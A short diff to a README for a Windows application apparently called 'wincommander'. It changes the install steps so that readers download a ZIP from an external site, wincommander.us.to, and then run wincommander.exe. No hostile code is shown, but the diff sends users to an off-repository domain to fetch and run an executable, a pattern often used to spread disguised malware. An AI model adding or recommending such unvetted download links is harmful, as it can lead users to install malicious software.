motoemoto47ark123/wincommander/README.md

 To install the application, follow these steps:

-1. Download the ZIP file.
+1. Go to [wincommander.us.to](http://wincommander.us.to) and download the ZIP file.
 2. Extract the ZIP file to your desired location.
 3. Run `wincommander.exe`.